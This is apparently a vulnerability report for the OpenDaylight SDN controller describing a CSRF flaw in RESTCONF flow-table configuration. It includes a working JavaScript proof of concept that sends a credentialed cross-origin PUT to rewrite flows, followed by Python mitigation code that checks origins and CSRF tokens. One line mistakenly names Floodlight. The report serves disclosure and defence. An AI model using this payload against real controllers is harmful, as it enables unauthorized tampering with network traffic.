Brief of this vulnerability
An attacker can insert or modify entries in the flow table. This attack was verified on Sodium-SR1. Although not tested on other versions, it is expected to apply to them as well.
Description
Hi, I found a CSRF bug in flow table inserting and modifying. It can be dangerous for the admin. The victim admin can insert the attacker's intended flow into the flow table.
CSRF PoC is below:
<meta charset="utf-8">
<script src="http://code.jquery.com/jquery-latest.min.js"></script>
<script language="javascript" type="text/javascript">
  var createCORSRequest = function(method, url) {
    var xhr = new XMLHttpRequest();
    if ("withCredentials" in xhr) {
      // Most browsers.
      xhr.open(method, url, true);
    } else if (typeof XDomainRequest != "undefined") {
      // IE8 & IE9
      xhr = new XDomainRequest();
      xhr.open(method, url);
    } else {
      // CORS not supported.
      xhr = null;
    }
    return xhr;
  };

  // RESTCONF config URL of flow 1 in table 0 of switch openflow:1 on the local controller.
  var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1';
  var method = 'PUT';
  var xhr = createCORSRequest(method, url);

  xhr.onload = function() {
    // Success code goes here.
  };
  xhr.onerror = function() {
    // Error code goes here.
  };

  xhr.setRequestHeader('Content-Type', 'application/xml');
  // withCredentials makes the browser attach the logged-in admin's credentials to the cross-origin PUT.
  xhr.withCredentials = true;
  xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?>' +
    '<flow xmlns="urn:opendaylight:flow:inventory">' +
      '<priority>4</priority><flow-name>asdfa</flow-name>' +
      '<match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match>' +
      '<ipv4-destination>10.0.0.1/24</ipv4-destination></match>' +
      '<id>1</id><table_id>0</table_id>' +
      '<instructions><instruction><order>0</order>' +
        '<apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions>' +
      '</instruction></instructions>' +
    '</flow>');
</script>
This attack is only one example, because ODL itself is vulnerable to CSRF attacks.
In fact, for any function that configures the ODL controller via the REST API, arbitrary malicious settings can be made using a CSRF attack.
If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings.
To Reproduce:
- Administrator's benign access:
  - Administrator is logged in to the DLUX GUI via the browser with an admin account
  - Administrator accesses the ODL controller using the REST API in the browser with an admin account
- Administrator visits the malicious webpage
Solution:
- Check CSRF tokens in all requests.
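The mitigation above, as an added example that is not OpenDaylight's code: a server-side guard that answers the CORS preflight only for allowlisted origins and requires both a same-site Origin/Referer and a per-session token on state-changing RESTCONF requests. The allowlisted origin, the x-csrf-token header name and the sample request are assumptions.

```python
"""CSRF/CORS guard modelled on the cross-origin RESTCONF PUT in the PoC above.
Added example, not OpenDaylight code; origin, header name and samples are assumptions."""
import hmac
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
ALLOWED_ORIGINS = {"http://127.0.0.1:8181"}  # assumption: UI served from the controller
TOKEN_HEADER = "x-csrf-token"                # hypothetical per-session anti-CSRF header

def _lower(headers):
    return {k.lower(): v for k, v in headers.items()}

def source_origin(headers):
    """Origin the browser attached, falling back to the Referer's scheme://host:port."""
    h = _lower(headers)
    if "origin" in h:
        return h["origin"]
    if "referer" in h:
        u = urlsplit(h["referer"])
        return f"{u.scheme}://{u.netloc}"
    return None

def preflight_headers(request_origin):
    """Reply to the CORS preflight a cross-origin PUT with application/xml triggers.
    Reflecting any Origin with Allow-Credentials: true is what lets the PoC through;
    a non-allowlisted origin gets no CORS headers, so the browser never sends the PUT."""
    if request_origin not in ALLOWED_ORIGINS:
        return {}
    return {"Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true",
            "Access-Control-Allow-Methods": "GET, PUT, POST, DELETE",
            "Access-Control-Allow-Headers": "Content-Type, " + TOKEN_HEADER,
            "Vary": "Origin"}

def check_state_change(method, headers, session_token):
    """(allowed, reason) for a request; origin check and token check must both pass."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    origin = source_origin(headers)
    if origin is None:
        return False, "no Origin/Referer on state-changing request"
    if origin not in ALLOWED_ORIGINS:
        return False, "cross-site origin " + origin
    if not hmac.compare_digest(_lower(headers).get(TOKEN_HEADER, ""), session_token):
        return False, "missing or wrong CSRF token"
    return True, "same-origin request with valid token"

# Constructed: headers the victim's browser attaches to the PoC's xhr.send().
POC_REQUEST = ("PUT", {"Origin": "http://attacker.example", "Content-Type": "application/xml"})
```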
Duplicates: AAA-213 Remove CORS filter from shiro-impl (Resolved)